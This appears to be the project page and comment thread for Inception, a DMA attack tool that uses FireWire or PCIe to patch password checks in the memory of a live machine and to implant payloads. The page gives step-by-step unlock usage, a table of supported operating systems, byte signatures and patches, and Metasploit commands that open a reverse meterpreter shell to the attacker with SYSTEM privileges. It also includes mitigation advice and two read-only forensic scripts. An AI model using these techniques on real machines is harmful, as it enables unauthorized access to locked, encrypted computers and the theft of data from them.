Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

How it works

Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.

Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.

After running that module you should be able to log into the victim machine using any password.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
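An added example, not part of Inception or of the original page: a read-only triage script that checks a captured memory image (for instance a VMware .vmem file) for the in-memory patch described above, by testing the known page offsets for either the original or the patched byte sequence. The signature, patch and offsets are the Windows XP SP3 values printed in a reader's tool output in the comments further down; the function names, the 4096-byte page size and the sample image are assumptions of this example.

```python
"""Read-only triage of a physical-memory image for a patched password check."""
import mmap
import sys
from dataclasses import dataclass

# 4 KiB pages, consistent with the tool output on this page:
# 0xe373312 // 4096 == 58227 ("page no. 58227").
PAGE_SIZE = 4096

# Windows XP SP3 msv1_0.dll values as printed in a reader's tool output in
# the comments of this page. The patched form differs only in two bytes,
# where a short conditional jump (75 11) is replaced by two NOPs (90 90).
ORIGINAL = bytes.fromhex("83f8107511b0018b")
PATCHED = bytes.fromhex("83f8109090b0018b")
PAGE_OFFSETS = (0x8AA, 0x862)


@dataclass(frozen=True)
class Finding:
    address: int   # physical address of the match
    page_no: int   # address // PAGE_SIZE
    offset: int    # offset of the match inside its page
    state: str     # "original" or "patched"


def scan_image(image, offsets=PAGE_OFFSETS, original=ORIGINAL,
               patched=PATCHED, page_size=PAGE_SIZE):
    """Check every page of `image` at the known offsets only.

    Anchoring on page offsets keeps the scan cheap and ignores stray copies
    of the same bytes elsewhere in memory, a source of false positives.
    """
    findings = []
    for base in range(0, len(image), page_size):
        for off in offsets:
            start = base + off
            chunk = image[start:start + len(original)]
            if chunk == patched:
                state = "patched"
            elif chunk == original:
                state = "original"
            else:
                continue
            findings.append(Finding(start, base // page_size, off, state))
    return findings


def verdict(findings):
    """Summarise a scan: 'tampered', 'intact', 'mixed' or 'not-found'."""
    states = {f.state for f in findings}
    if not states:
        return "not-found"      # code not resident, or above the imaged range
    if states == {"patched"}:
        return "tampered"
    if states == {"original"}:
        return "intact"
    return "mixed"              # several mapped copies; inspect each hit


def build_sample_image(pages=8):
    """Constructed 32 KiB image: one patched hit plus one off-offset decoy."""
    image = bytearray(pages * PAGE_SIZE)
    hit = 5 * PAGE_SIZE + 0x8AA
    image[hit:hit + len(PATCHED)] = PATCHED
    decoy = 6 * PAGE_SIZE + 0x100      # same bytes, not at a known offset
    image[decoy:decoy + len(PATCHED)] = PATCHED
    return bytes(image)


if __name__ == "__main__":
    if len(sys.argv) == 2:              # path to a raw memory image
        with open(sys.argv[1], "rb") as fh:
            data = mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ)
            hits = scan_image(data)
    else:
        hits = scan_image(build_sample_image())
    for h in hits:
        print(f"{h.state:8} at {h.address:#x} in page no. {h.page_no}")
    print("verdict:", verdict(hits))
```

A "not-found" result does not clear a machine: the code may simply lie outside the imaged range or belong to a build with different offsets.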

Awesome! But why?

The world’s forensics experts, governments and three-letter acronym agencies are using similar tools already, so why not? Inception is free, as in beer. A professional equivalent tool will set you back ~10 000 USD. Hack back!

Key data

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.


Inception requires:

  • Hardware:
    • Attacker machine (host): Linux or Mac OS X with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy FireWire interfaces on OS X.
    • Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
  • Software:
    • Python 3
    • git
    • gcc (incl. g++)
    • cmake
    • pip (for automatic resolution of dependencies)
    • libforensic1394
    • msgpack


On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 install

Download and install Inception

git clone git://
cd inception
./ install

The setup script should be able to install dependencies if you have pip installed.

General usage

  1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
  2. Run Inception

Simply type:

incept [module name]

For a more complete and up-to-date description, please run:

incept -h

or see the tool home page.


As of version 0.4.0, Inception has been modularized. The current modules and their functionality are described below.

For detailed options on usage, run:

incept [module name] -h

Note: Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting almost all modules. Look for vtd[0] fault entries in your log/console.


The unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered on machine you have physical access to. The module is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption.

The unlock module is stable on machines that have 4 GiB of main memory or less. If the target has more than that, you need to be lucky in order to find the signatures mapped to a physical memory page frame that the tool can reach.

As of this version, it is able to unlock the following x86 and x64 operating systems:

OS              Version         Unlock lock screen   Escalate privileges
Windows 8       8.1             Yes                  Yes
Windows 8       8.0             Yes                  Yes
Windows 7       SP1             Yes                  Yes
Windows 7       SP0             Yes                  Yes
Windows Vista   SP2             Yes                  Yes
Windows Vista   SP1             Yes                  Yes
Windows Vista   SP0             Yes                  Yes
Windows XP      SP3             Yes                  Yes
Windows XP      SP2             Yes                  Yes
Windows XP      SP1
Windows XP      SP0
Mac OS X        Mavericks       Yes (1)              Yes (1)
Mac OS X        Mountain Lion   Yes (2)              Yes (2)
Mac OS X        Lion            Yes (2)              Yes (2)
Mac OS X        Snow Leopard    Yes                  Yes
Mac OS X        Leopard
Ubuntu (3)      Saucy           Yes                  Yes
Ubuntu          Raring          Yes                  Yes
Ubuntu          Quantal         Yes                  Yes
Ubuntu          Precise         Yes                  Yes
Ubuntu          Oneiric         Yes                  Yes
Ubuntu          Natty           Yes                  Yes
Linux Mint      13              Yes                  Yes
Linux Mint      12              Yes                  Yes
Linux Mint      12              Yes                  Yes

(1): Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D effectively blocking DMA requests and thwarting this attack. Look for vtd[0] fault entries in your log/console.

(2): If FileVault 2 is enabled, the tool will only work when the operating system is unlocked as of OS X Lion.

(3): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.

The module also effectively enables escalation of privileges, for instance via the runas or sudo -s commands, respectively.


To unlock, simply type:

incept unlock

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):

[1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu libpam unlock/privilege escalation
[7] Linux Mint libpam unlock/privilege escalation

[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============>                                                ]  227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful


The implant module implants a (potentially memory-only) Metasploit payload directly to the volatile memory of the target machine. It integrates with MSF through the msfrpcd daemon that is included in all versions of Metasploit.

The current version only works as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request.


To use it, start msfrpcd:

msfrpcd -P [password]

Then launch inception:

incept implant --msfpw [password] --msfopts [options]

As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the msfrpcd daemon, and then launch a console listening for callbacks.

msfrpcd -P password

In the console, we configure the receiving end of the payload. We’re setting the EXITFUNC option to thread to ensure that the target process stays alive if something should go awry:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set EXITFUNC thread
set ExitOnSession false
exploit -j

Then, in another terminal, we launch Inception:

incept implant --msfpw password --msfopts LHOST=

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future. If you want to
    change this, send me a wad of cash in unmarked dollar bills or a pull
    request on github.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST:
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful

In your MSF console, you should see something similar to this:

msf exploit(handler) > [*] Sending stage (769536 bytes) to
[*] Meterpreter session 1 opened ( -> at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6 -> (

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Not working you say? Here’s a couple of hints:

  • First, use the -v switch to visually confirm that the tool is able to read memory from the victim.
  • Make sure you actually are connected with an IEEE 1394 FireWire cable (FireWire to USB converters, etc. won’t work, but 4/6/9 pin FireWire adapters do). Doh.
  • “No firewire devices detected on the bus”
    • First, try running the tool again.
    • If you get this error message, try a different cable and/or using a couple of converters (such as this and this) to convert from 6/9 pin FireWire connector to 4 pin and back again. 6/9 pin FireWire cables are capable of transferring power, and this may cause trouble for some FireWire chipsets. Some FireWire cables are also known to be “straight-through” (i.e., not “crossover”), and this is known to cause trouble.
    • Are you attacking from an OS that doesn’t support hot-plugging (such as BackTrack) using an ExpressCard/etc. on the host side? Re-boot the machine with the expansion card plugged in before running Inception.
  • Are you sure you’re getting DMA? Sometimes the target machine uses an extended period of time (I’ve experienced time-spans up to around 30 secs on slow targets) installing the FireWire drivers and lowering the DMA shield; it is possible that you just didn’t wait long enough before attacking. Use the delay switch to increase the delay, and -v/--verbose to see if you actually read data. Also, looking in the Device Manager (assuming you are setting up a demo attacking Windows) may be helpful to see that a FireWire SBP2 device actually pops up when running the tool. Mind you, a yellow exclamation mark by the device is all right; the tool should work nevertheless.
  • Does your target use some form of endpoint protection? Some antivirus vendors specifically block FireWire DMA. Turn it off and see what happens.
  • Does your FireWire port work? Try connecting a FireWire disk and see if it is recognized. Check your BIOS setting to see that it is not disabled. Ensure that FireWire drivers are present and not removed from the system.
  • Are you getting data, but still can’t find the signature? Check the above and see the FAQ below. Also check the amount of RAM installed (FireWire max addressable memory space is 4 GiB). The code may lie above that threshold, in which case the unlock attack won’t work. This is especially true for Linux machines, where kernel code resides in high memory addresses.
  • Did Inception patch successfully, but you cannot log in? Try a non-blank password. Some OS authentication mechanisms check for blank passwords before passing control to the mechanism that Inception patches.
  • Try again. Sometimes the DMA shield fails to lower on the first try/tries.

Known bugs

  • Due to severe bugs in the Mac OS X FireWire stack IOKit, attacking from a Mac can cause a kernel panic at the target and/or host system if an error condition should occur. As of March 2012, attacking from Mac OS X is not recommended.

*) Caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool looks for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that don’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
  • If you have an OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.
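
An added example, not code from Inception or the original page: when a dump taken this way is kept as evidence, this reports which address ranges actually returned data. It assumes, as one reader describes in the comments below, that unreadable ranges come back as pages filled entirely with 0x00 or 0xff; the function names, the 4096-byte page size and the sample image are constructed for the example.

```python
"""Coverage check for a memory image acquired over a DMA-capable bus."""

PAGE_SIZE = 4096  # assumed page granularity


def classify_page(page):
    """Return 'zero', 'ones' or 'data' for one page of the image."""
    if page.count(0x00) == len(page):
        return "zero"
    if page.count(0xFF) == len(page):
        return "ones"
    return "data"


def coverage_runs(image, page_size=PAGE_SIZE):
    """Group consecutive pages of the same kind into (kind, start, end) runs.

    A single all-zero page is normal in live RAM, so the interesting signal
    is a long filler run, typically towards the top of the address range.
    """
    runs = []
    for base in range(0, len(image), page_size):
        end = min(base + page_size, len(image))
        kind = classify_page(image[base:end])
        if runs and runs[-1][0] == kind:
            runs[-1] = (kind, runs[-1][1], end)   # extend the current run
        else:
            runs.append((kind, base, end))
    return runs


def readable_fraction(runs):
    """Share of the image, by bytes, that holds non-filler data."""
    total = sum(end - start for _, start, end in runs)
    data = sum(end - start for kind, start, end in runs if kind == "data")
    return data / total if total else 0.0


def longest_filler_run(runs):
    """Largest 'zero' or 'ones' run, or None if the image has no filler."""
    filler = [r for r in runs if r[0] != "data"]
    return max(filler, key=lambda r: r[2] - r[1], default=None)


def build_sample_image():
    """Constructed 64 KiB image: data, one zero page, then a 0xff tail."""
    data_page = bytes(range(256)) * (PAGE_SIZE // 256)
    pages = [data_page] * 3 + [bytes(PAGE_SIZE)] + [data_page] * 6
    pages += [b"\xff" * PAGE_SIZE] * 6
    return b"".join(pages)


if __name__ == "__main__":
    sample_runs = coverage_runs(build_sample_image())
    for kind, start, end in sample_runs:
        print(f"{kind:5} {start:#010x}-{end:#010x}")
    print(f"readable: {readable_fraction(sample_runs):.1%}")
```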

Attack mitigation

To stay safe and protect against FireWire DMA attacks, here’s a couple of suggestions:



  • Don’t panic – if you are using FileVault2 and OS X Lion (10.7.2) and higher, the OS will automatically turn off DMA when locked – you’re still vulnerable to attacks when unlocked, though
  • Set a firmware password


All of the above will impact FireWire in one way or the other. Unfortunately, this is a FireWire design problem, not an OS problem, and would have to be fixed in the SBP-2 protocol itself.


Inception was originally coded as a GPL replacement for winlockpwn, the Windows FireWire unlock tool made available by Adam Boileau aka Metlstorm. winlockpwn was quite stable against older Windows XP targets, but did not perform well against more modern operating systems like Windows 7 (and it is not maintained anymore). As of Linux kernel 2.6.22, Linux distros ship with the new ‘Juju’ FireWire stack, making winlockpwn obsolete. Alas, Inception was born.

DMA attacks have been known for many years, so this is nothing new (except for the fact that I will reverse engineer new signatures and update the tool’s functionality until the problem is fixed). However, vendors generally dismiss DMA attacks as a non-issue, which I hope that the awareness that this tool generates will change. Users deserve secure devices, even when attackers gain physical access.


  1. Q: This tool is irrelevant, I can just boot the machine with [insert live CD OS here], dump the SAM and SECURITY hives and crack the passwords.
    A: No, you can’t if the target is a full disk encrypted machine. See above. This tool is designed to unlock powered on machines that utilize secure, full disk encryption. It is also far stealthier than the above attack.
  2. Q: Can’t I just use the screen_unlock.rb Metasploit script?
    A: Well you can, assuming that you already have a shell at the target machine. If you have that, you probably won’t need this tool.
  3. Q: I use full disk encryption. Your tool is moot.
    A: No, you’re missing the point: The tool is intended to be used against full disk encrypted machines. See FAQ 1.
  4. Q: This is FUD! I would never let anyone plug anything into my machine! I’m never more than an arm’s length from my computer. In fact, my machine is the only object I have a non-platonic relationship with, and I would never let my eyes off her. No one would go to the trouble of hacking a single machine anyway.
    A: Good for you. The attack is dependent on physical access to a box in a powered on or standby state, so likely you’ll not be hacked. However, there are organizations out there that would go to utmost lengths to be able to access machines in seconds without leaving a trace. If you are not a target of these organizations, you’re likely never going to be hacked this way. However, if it is your job to be paranoid, you should know about this attack and make an informed decision to protect yourself.
  5. Q: I’ve just glued/desoldered all my Firewire ports. Your move, mhuddafuckah.
    A: Ahem. See the answer to FAQ 7.
  6. Q: Wasn’t this fixed years ago? I remember hearing about this in the olden days (2004).
    A: Sadly, no. And yes, the problem is old, but it is not entirely fixable with a driver update, a patch or a new OS version. The problem is in the FireWire specs. All OS vendors that want to include FireWire drivers that are OHCI compliant and work out of the box with SBP-2 devices are vulnerable to some degree.
  7. Q: Isn’t FireWire a dying horse? Few laptops ship with FireWire ports these days, which makes Inception a useless tool.
    A: You can use any interface that expands the PCIe bus, for example PCMCIA, ExpressCards, the new Thunderbolt interface and perhaps SD/IO to hotplug a FireWire interface into the victim machine. The OS will install the necessary drivers on the fly, even when the machine is locked.
  8. Q: Your tool isn’t working.
    A: That’s not a question. Check the troubleshooting section above first, and when you have made sure that the error source isn’t between the chair and the keyboard, preferably open an issue at github describing the problem, including:
    • Your host OS
    • The target OS (For Windows, the output of running winver.exe on the machine, format:, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
    • The target CPU architecture (x86/x64, etc.)
    • Output of the tool
    • Memory size of target

License / donate

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

If you like the tool, and especially if you use it successfully in a digital investigation, please consider making a donation to me:

My Bitcoin address


362 Responses to “Inception”

  1. killerbiz

    Thks for this great tool !
    Does it work with smartcard logon? (user/passwd deactivated)
    If not it could be great to implement it.
    Best regards,

    • Carsten

      Maybe. The smart card reader would have to communicate with the OS in some way, and that communication would necessarily result in pages being loaded into memory and executed. If the smart card reader needs its own authentication modules loaded, I would probably need to reverse engineer the driver to understand how to eliminate the checks that verify your smart card. Unfortunately, I’m not currently in possession of a smart card reader.

      If you have a reader available, try it out. The existing patching of msv1_0.dll may very well work against smart card authentication as well.

      • killerbiz

        Thks for the fast answer.
        I’ll test it against smart card soon and will keep you aware of the result.

        ps: great results on the standard log/pass authent !

  2. tekkenhead

    I had the same problem with windows xp sp2 so I changed the offset and signature to this:


    I haven’t tried it out. But it should NOP the jump function as in the other OS’s listed. I also had to change the vista pageoffset to suit my needs as well to get it to work for me.

    • Carsten

      Thanks, I’ll check it out. The vista signature is quite old, so I’m not surprised it has changed. Do you have it available?

  3. tekkenhead

    I wanted to say it’s a great program. So is winlockpwn; I got it to work for windows xp after tweaking the signature offsets and it was a great way to learn about IDA.

    I was wondering if in the next version of ftwautopwn there could be a way of trying older or multiple pageoffsets instead of manually updating the config.cfg file. If I am not mistaken I think you can only apply multiple patches to the same file now.


    • Carsten

      Thanks. That is exactly what I’m working on: improving signature robustness and parallel search at multiple offsets. Stand by for a new release sometime during the next few weeks.

  4. tekkenhead

    Here is the pageoffset I used for Vista Ultimate with SP1.

    I also wanted to let you know I used a 4 pin cable with a 6 pin male adapter and it worked great.

  5. jan

    I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. the error I get is:

    Please select target (or enter ‘q’ to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x862 (2146)
    Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
    File “./”, line 80, in
    File “./”, line 76, in main
    File “/home/jan/FTWAutopwn/ftwautopwn/”, line 129, in run
    d = initialize_fw(d)
    File “/home/jan/FTWAutopwn/ftwautopwn/”, line 254, in initialize_fw
    d = b.devices()[0]
    IndexError: list index out of range

    any ideas?

    • jan

      Just a little more info. I booted the target system (thinkpad r500) into ubuntu 9.04 to see if windows was the issue. I get the same error. I did increase the delay time on both systems with no positive result. I took the source computer (thinkpad r500 also) and plugged it into my desktop system. There the ftwautopwn ran but resulted in the same as a previous poster along the lines of

      [+] Searching for signature, 379 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/--verbose to debug.

      so the ftwautopwn can connect to the desktop just fine, but not the laptops (I also tried xp sp3 on a thinkpad r400 as target but can’t connect to it either)

      The target xp laptop can connect to my xp desktop and do filesharing via firewire with no problem, so I know the hardware on all computers is ok.

      I am out of ideas.

      • Carsten

        Hi Jan, unfortunately it is hard for me to debug this remotely. If you are able to use the tool against one machine, but not another, and booting into another OS at the target doesn’t help, it is likely a hardware problem. You could try to create another FireWire port by plugging in an ExpressCard etc. to see if that resolves the issue.

        • jan

          Ordered a new cable and firewire cards to plug into laptop. Will let you know how it goes. Thanks for the reply

          • jan

            I got 2 pc card firewire adapters to shove into the laptops, and the program then executes.

            However, I still get no result. what I see is along the lines reported by a previous poster:
            Continue? [Y/n]: y
            [+] Searching for signature, 379 MiB so far.
            [-] Looks like we’re not getting any data. We could be outside memory
            boundaries, or simply not have DMA. Try using -v/--verbose to debug.

            I see it scanning through changing data values, but never finds a match. I tried 3 different computers of XP with SP3 in 2 different languages (eng, and german). No luck. I disassembled the dll file with IDA Pro and the offsets and everything looks ok.

            No clue what is happening, but my chance to demonstrate the party trick has come and gone….

          • Carsten

            That’s weird. Sounds like you are not getting DMA. Maybe you could try to dump the entire memory using the tool volatility and inspect the result? Language should have nothing to do with this.

            Edit: I’ve never had any problems like this using the tool – at least not against Windows XP. The signatures are very stable, and as you say, you were able to disassemble the msv1_0.dll file yourself to confirm them. What kind of hardware are you using on the attacking side?

  6. jan

    Using a thinkpad R500 on the attacking side. I bought 2 types of firewire card, one express card and one pcmcia card, since the laptops have both types of slots. I tried all combinations of configurations but none work. however, the type of card I have in the slot determines the data I get when we are out of memory range. For example, when it reads in the region about 3GB where there is no memory I either see all fffffff or 000000 depending on the card. Where there is memory, I see rapidly changing memory contents, so I think I have access to at least some memory.

    I am going to dig up my old emachines laptop and put the pcmcia card in it to see what is up.

    can you tell me how to do a memory dump using volatility?

  7. marc

    on a windows 7 sp1 32bit:

    the memory location is found and the location patched.
    when I enter a random password, I get an error “RPC service unavailable” and can not login, also not with the correct password. There is no difference if the user is local or a domain user and if there is network connectivity or not.

    any idea how to get this working in such a case?

    • Carsten

      Sounds like a false positive (ie. that there are more than one match in-memory). Do you get this error consistently? I’m working on creating more stable signatures for Win7, both 32 and 64 bit, unfortunately the progress is a bit slow…

      • marc

        Hi Carsten,

        well I tried 3 times with the same result (rebooting, and working with the account for some time), so I’d say it’s consistent.

        • Carsten

          Hi Mark sorry for the late reply. As you may see from this page, I’ve been busy coding and renaming the tool. Could you test the new tool against your Win7 box (as described above)?

          The new matching algorithm will hopefully solve your problems.

  8. ncfa

    hi Carsten
    it is really great tool. thank you for that.
    the tool was working for 32 bit systems but when i tried it on a machine that has 64 bit Windows 7, it didn’t work. i checked the signature and offset value of my system, all is ok. but not working. is there a critical point that might be useful for 64 bit operating systems?

    And also i tried to find signature for Linux and Mac systems. but i couldn’t find any useful info. how can i find the signature and offset values for Linux and Mac operating systems?

    • Beka

      Hi Carsten,
      I did some tests and with the same results as ncfa, Windows 7 32 bits works great but none of the 64 bits workstations seems to work.

      • Carsten

        Hi, thanks for alerting me. On both my 64-bit Win7 machines, inception is working great. Can you open a ticket at github with:

        – Your host OS
        – The target:
        – OS (For Windows, the output of running winver.exe on the machine, format:, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
        – Amount of physical memory (RAM)
        – The target CPU architecture (x86/x64, etc.)
        – Output of the tool

  9. tekkenhead

    Can you give me more info on how to use -f switch in I have some virtualbox images and would like test. I also have vmware if I need that too. Thanks.

    • Carsten

      Unfortunately, Virtualbox doesn’t store the memory from snapshots in binary data files like VMware, but rather uses a compressed (?) format. FTWA does currently not support this format. You can use the -f switch to search through VMware memory (.vmem) files located in your vm folder.

      If you venture into dissecting the virtualbox format, drop me a note.

      • tekkenhead

        Thanks for the info, but I decided not to redo my images in vmware or try and convert them right now.

        I have recently tried your version and it works great. But there is a problem I ran into. I got a keyboardinput error with a patchoffset error when running it against a windows xp machine. I looked at your code and you didn’t have a 'patchoffset': 0x00 under the windows xp settings. I changed that and the program worked fine. I only mention that if someone runs into the same error.

        I also deleted the 5 lines that dealt with offset 0x927 and added offset 0x9B6 instead under the other offsets. I recently upgraded an old windows xp sp2 to sp3 and found a new offset as well. Here are my signatures for xp: 'offsets': [0x0126, 0x8aa, 0x862, 0x946, 0x09B6]. I know xp is old but trying to be thorough.

        I tried your program under windows 7 x86 and everything works great and same can be said under windows 7 x64 including sp1 but I didn’t have any antivirus running and it was a fresh install, but completely updated. If you can also add signature offset 0x80F for vista that would be cool. I am currently working on vista trying to find all signatures. Thanks again.

  10. Alex Cheng

    Hi, I’d just checked my laptops and they have a 4 pin female firewire port if I’m not wrong. So to connect from a laptop to another laptop one will need a 4 pin to 4 pin firewire cable?

    Thanks in advance.

  11. Alex Cheng

    One slight problem, I cannot login to active directory after reboot. i’m Not connected to LAN, at home now. not sure why. Have to get back to IT next Monday to see if it can be fixed =/

    • sbenting

      I ran across this, as well. For a domain account, it appears to leave something behind even after a reboot until you reconnect to the network and log in with the correct password again. Once it reauthenticates against the domain controller, all should work fine.

      • Carsten

        I guess this is Windows cached credentials playing a trick on the AD authentication. I’ll have a look and see if it is possible to patch so that the erroneous password is not cached.

      • SS

        Found something interesting here:
        “Remember that once the memory is patched and the user who locked the screen is part of a domain you need to immediately revert the patching by issuing the “screen_unlock -r” command after you log into Win7 with ANY password, or the domain account will be locked after a while.”
        I can confirm that the statement above is true, because after patching a Win7 x64 Enterprise laptop (part of domain) with Inception I was able to log in with a random password a few times to test, but after a while (perhaps a few hours) the domain account got locked.

  12. tekkenhead

    Wanted to say thanks for the credit on the readme. Been pretty busy as of late to work on this right now. But wanted to say I love the new name!

  13. Will

    Wow, great tool! I finally got an Ubuntu LiveUSB working on my Mac (the EFI makes it really hard), and I was able to try it out. The memory dump worked great! I was surprised at the amount of human-readable text in the first few megs of RAM from a dump of a Mac. Quite a few funny random things strewn about in there!

    However, I was unfortunately unable to use this software to actually extract a password or disable the unlock screen. Is there anything that I can do to help make a signature that works with OS X 10.7/10.8?

    Also, it would be great if the tool was capable of either writing to a custom file location or even Stdout. When using a LiveCD with no persistence, RAM dumps are very space-expensive, so being able to write to an external device or a FIFO or something can be useful.

    • Carsten

      The signatures for OS X for unlocking are outdated, I’m working on “reversing” new ones (slowly, I don’t have much spare time after working 60-80 hrs / wk). If you’d like to help, this is where you could contribute. You could also fork my project on github, make improvements and issue a pull request for inclusion in Inception.

      Memory dumping and extraction of passwords should work though, I’ve tested that myself on Lion.

      Good suggestions regarding output file – I’ll implement that in the next minor version.

      • NB

        How can I redirect the output to an external drive? I did not find anything in the “help” of this tool… thank you

  14. Skrotor

    Hi! Great tool.

    I tried the tool against an Ubuntu 11.10 and got a successful result. However, when I try to unlock, the screen goes black and throws me back to the locked screen. Something obviously happened since I’m no longer getting “invalid password” but I’m still not able to access the system.


    Regards Skrotor

    • Carsten

      Hmm. Let me try that on my own machine, it may be that the tool finds a false positive and that I will need to expand the signatures to make them more accurate. Can you post the output of the following commands here?

      uname -a
      cat /etc/lsb-release

      • Skrotor

        Sure can!

        [email protected]:~$ uname -a
        Linux luit-HP-Compaq-nc8230-DX443AV 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
        [email protected]:~$ cat /etc/lsb-release
        DISTRIB_DESCRIPTION="Ubuntu 11.10"

          • Carsten

            I was unable to reproduce with the Ubuntu copy I had back home, but I’m doing a re-install to verify. If you want, you could try running the tool several times (if it finds several signatures, we know the culprit is a false positive)

          • Skrotor

            Ok, here is the output.

            First run:

            [*] Signature found at 0x3d7c6de0 (@page # 251846)
            [*] Data written: 0x0x31db
            [*] Data read: 0x0x31db
            [*] Write-back verified; patching successful

            The second run didn’t give any output after completing.

          • Carsten

